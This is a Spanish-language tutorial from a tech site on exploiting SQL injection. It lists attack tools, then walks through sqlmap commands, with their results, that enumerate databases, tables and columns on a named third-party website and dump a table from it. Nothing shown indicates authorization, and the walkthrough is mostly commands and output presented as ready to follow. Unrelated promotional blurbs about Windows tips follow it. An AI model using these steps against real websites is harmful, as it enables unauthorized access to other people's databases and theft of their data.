En esta sección, LuckyTemplates le presentará algunas herramientas utilizadas para explotar la inyección SQL .
Actualmente existen muchas herramientas de escaneo de vulnerabilidades de seguridad (incluida la inyección SQL). Estas herramientas permiten detectar y explotar con bastante fuerza las vulnerabilidades de inyección SQL. Algunas herramientas de explotación de vulnerabilidades de inyección automática de SQL comúnmente utilizadas incluyen:
También hay otras herramientas a las que puede hacer referencia, como: Netsparker, jSQL Inyección, Burp, BBQSQL...
A continuación se muestra una demostración del uso de Sqlmap para aprovechar la inyección SQL básica.
Puede descargar Sqlmap en http://sqlmap.org/
Sqlmap está escrito en Python, por lo que para utilizar esta herramienta es necesario instalar Python. Puede descargar Python en http://www.python.org/downloads/
Primero debes identificar el sitio web de destino, aquí tengo el siguiente destino: http://zerocoolhf.altervista.org/level1.php?id=1 (esta página ya está muerta).
Paso 1 : abre cmd y escribe el siguiente comando:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”
sqlmap detectará la vulnerabilidad del objetivo y proporcionará información sobre la vulnerabilidad.
Paso 2 : Una vez que hemos determinado que el sitio web de destino tiene una vulnerabilidad de inyección SQL, procedemos a buscar el nombre de la base de datos.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs
=> Base de datos: my_zerocoolhf
Paso 3 : Después de determinar el nombre de la base de datos, continuaremos buscando los nombres de las tablas en la base de datos.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf
=> Hay 2 tablas en la base de datos: auth y book
Paso 4 : determine los nombres de las columnas de la tabla
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book
=> Identifique las columnas en la tabla del libro: autor, id, precio, título.
Paso 5 : volcar datos de la tabla.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book
=> Entonces hemos obtenido la base de datos del sitio web de destino.
Arriba hay una demostración básica del uso de sqlmap para explotar errores de inyección SQL. Puede obtener más información sobre las opciones de sqlmap en https://github.com/sqlmapproject/sqlmap/wiki/Usage para soportar la explotación. Explotación de inyección SQL.
¿Ves una notificación de activación de Windows 10 en la esquina derecha de la pantalla? Este artículo le guiará sobre cómo eliminar el aviso de solicitud de derechos de autor en Windows 10.
Recientemente, Microsoft lanzó la última actualización acumulativa para usuarios de PC con Windows 10 llamada Build 14393.222. Esta actualización lanzada para Windows 10 corrige principalmente errores basados en los comentarios de los usuarios y mejora la experiencia de rendimiento del sistema operativo.
¿Tiene computadoras en su red local que necesitan acceso externo? Usar un host bastión como guardián de su red puede ser una buena solución.
A veces es posible que necesites eliminar todos los registros de eventos antiguos a la vez. En esta guía, Quantrimang.com le mostrará 3 formas de eliminar rápidamente todos los registros de eventos en el Visor de eventos de Windows 10.
Si prefiere usar un teclado clásico antiguo, como el IBM Modelo M, que no incluye una tecla física de Windows, existe un método sencillo para agregar más, tomando prestada una tecla que no usa con frecuencia.
WindowTop es una herramienta que tiene la capacidad de atenuar todas las ventanas de aplicaciones y programas que se ejecutan en computadoras con Windows 10. O puede usar una interfaz de fondo oscuro en Windows.
En muchos artículos anteriores hemos mencionado que permanecer anónimo en línea es extremadamente importante. Cada año se filtra información privada, lo que hace que la seguridad en línea sea cada vez más necesaria. Esa es también la razón por la que deberíamos utilizar direcciones IP virtuales. ¡A continuación, aprenderemos sobre métodos para crear IP falsas!
La barra de idioma en Windows 8 es una barra de herramientas de idioma en miniatura diseñada para mostrarse automáticamente en la pantalla del escritorio. Sin embargo, mucha gente quiere ocultar esta barra de idioma en la barra de tareas.
Maximizar la velocidad de Internet es esencial para optimizar su conexión de red. Podrás tener una óptima experiencia de entretenimiento y trabajo utilizando computadoras, televisores con acceso a Internet, consolas de juegos, etc.
La conectividad inalámbrica es una necesidad hoy en día y, por eso, la seguridad inalámbrica es esencial para garantizar la seguridad en su red interna.
